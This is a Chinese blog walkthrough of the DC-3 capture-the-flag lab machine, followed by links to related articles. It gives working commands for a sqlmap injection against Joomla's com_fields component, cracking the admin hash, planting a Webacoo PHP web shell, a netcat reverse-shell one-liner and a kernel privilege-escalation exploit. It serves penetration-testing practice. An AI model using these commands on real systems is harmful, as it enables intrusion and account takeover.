Neos的渗透测试靶机练习——DC-3

简介: Neos的渗透测试靶机练习——DC-3

DC-3
一、实验环境
二、开始渗透

  1. 搜集信息
  2. sqlmap
  3. 上传PHP木马
    三、总结
    一、实验环境
    虚拟机软件:VirtualBox
    攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
    靶机:DC-3(网卡初始为仅主机模式,要有安全意识)
    1
    2
    3
    二、开始渗透
  4. 搜集信息
    输入sudo su,将kali切换到root权限;

输入ifconfig查询自身ip,即攻击机ip;

可以看到自身ip为192.168.56.101,对应的网卡名称为eth0。
本次渗透我们选择输入netdiscover -i eth0扫描本网段存活主机,即靶机ip地址。

可以看到靶机ip为192.168.56.106,。
输入nmap -sV -p- 192.168.56.106,查看靶机端口开放信息。

看到只开放了一个80端口,即http服务。
浏览器输入192.168.56.106:80。

命令行输入whatweb -v 192.168.56.106查询网站指纹信息。

可以看到一些关键信息,其中Joomla是一个基于PHP的内容管理系统(CMS)。

  1. sqlmap
    至此,基本思路为扫目录,查找有没有后台登陆界面。
    有一个针对Joomla的目录扫描工具-Joomscan。
    命令行输入joomscan --url 192.168.56.106。

发现Joomla版本号和一个admin页面,http://192.168.56.106/administrator/,浏览器打开。

基本思路是看看有没有sql注入或Joomla版本漏洞,作为一个脚本小子,根本没精力自己注入好吧,searchsploit扫起来。

cat看看这个42033.txt的内容。

这里exp教我们使用sqlmap进行sql注入。
命令行输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

可以看到爆破出来了几个数据库,这里我们瞄准joomladb,继续爆破表名。输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

出来了一长串,我们看到下方有#_users表,应该跟用户信息有关,针对该表,爆破属性名。
输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

爆破出来了几个属性名,瞄准name,username,password,继续爆破。
输入sqlmap -u "http://192.168.56.106/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,username,password --dump -p list[fullordering]

爆破出来了用户名admin和一长串的加密密码。
将加密字符串写入一个pswd.txt文件中。并输入john pswd.txt进行解密。
得解密密码为snoopy,重新登陆后台。

  1. 上传PHP木马
    发现Templates版块中可以编辑PHP文件,可上传PHP木马。
    我这里使用Webacoo生成PHP木马
    命令行输入webacoo -g -o test1.php,将test1.php中的内容上传,文件名为shell.php中并保存,注意格式。

命令行输入webacoo -t -u http://192.168.56.106/templates/beez3/shell.php成功连接后台。

发现自己是www-data用户,linux版本为4.0.21,Ubuntu为16.04。

攻击机输入nc -lvvp 4444监听4444号端口,
靶机输入rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.101 4444 >/tmp/f,反弹shell。
输入searchsploit Ubuntu 16.04,选则39772.txt进行提权。

输入cat /usr/share/exploitdb/exploits/linux/local/39772.txt,其中给出了exp的下载地址。

此时注意,将网卡设置为网络地址转换NAT模式,命令行输入wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip,将该压缩包下载到本地,然后将网卡调回到仅主机模式。

将该压缩包传到靶机上,攻击机命令行输入python -m http.server 8080
靶机命令行输入 wget http://192.168.56.101:8080/39772.zip。

靶机中输入unzip 39772.zip,解压该压缩包。

输入tar-xvf exploit.tar解压其中的exploit.tar。

进入ebpf_mapfd_doubleput_exploit目录,运行之中的compile.sh文件和doubleput.c文件。

至此,我们得到了root权限,root目录获得最终flag。

至此,渗透结束。
————————————————

                        版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/qq_38678845/article/details/135453379

目录
相关文章
|
2月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
37 4
|
2月前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
26 2
|
2月前
|
安全 Shell 网络安全
DC-2靶机上了解和练习WordPress框架
本文介绍了在一个名为DC2的虚拟环境中进行渗透测试的过程。首先通过扫描发现SSH和Web端口,并进行全端口扫描以寻找隐藏端口。接着通过信息收集、漏洞利用(如SQL注入、文件上传漏洞等)、反弹Shell及提权等步骤逐步攻陷目标系统。文章详细描述了使用Cewl生成字典、Dirsearch扫描目录、Wpscan枚举WordPress用户等技巧,并最终通过SSH登录和Git命令实现了提权,获取多个flag。
|
3月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
40 0
|
2月前
|
安全 网络安全
Kali渗透测试:使用Armitage扫描网络
Kali渗透测试:使用Armitage扫描网络
|
2月前
|
安全 Linux 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
|
2月前
|
Python Windows 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
|
2月前
|
Java 网络安全 Windows
Kali渗透测试:使用 Armitage生成被控端和主控端
Kali渗透测试:使用 Armitage生成被控端和主控端
|
29天前
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
2月前
|
存储 安全 小程序
Kali渗透测试:使用Word宏病毒进行渗透攻击
Kali渗透测试:使用Word宏病毒进行渗透攻击
Kali渗透测试:使用Word宏病毒进行渗透攻击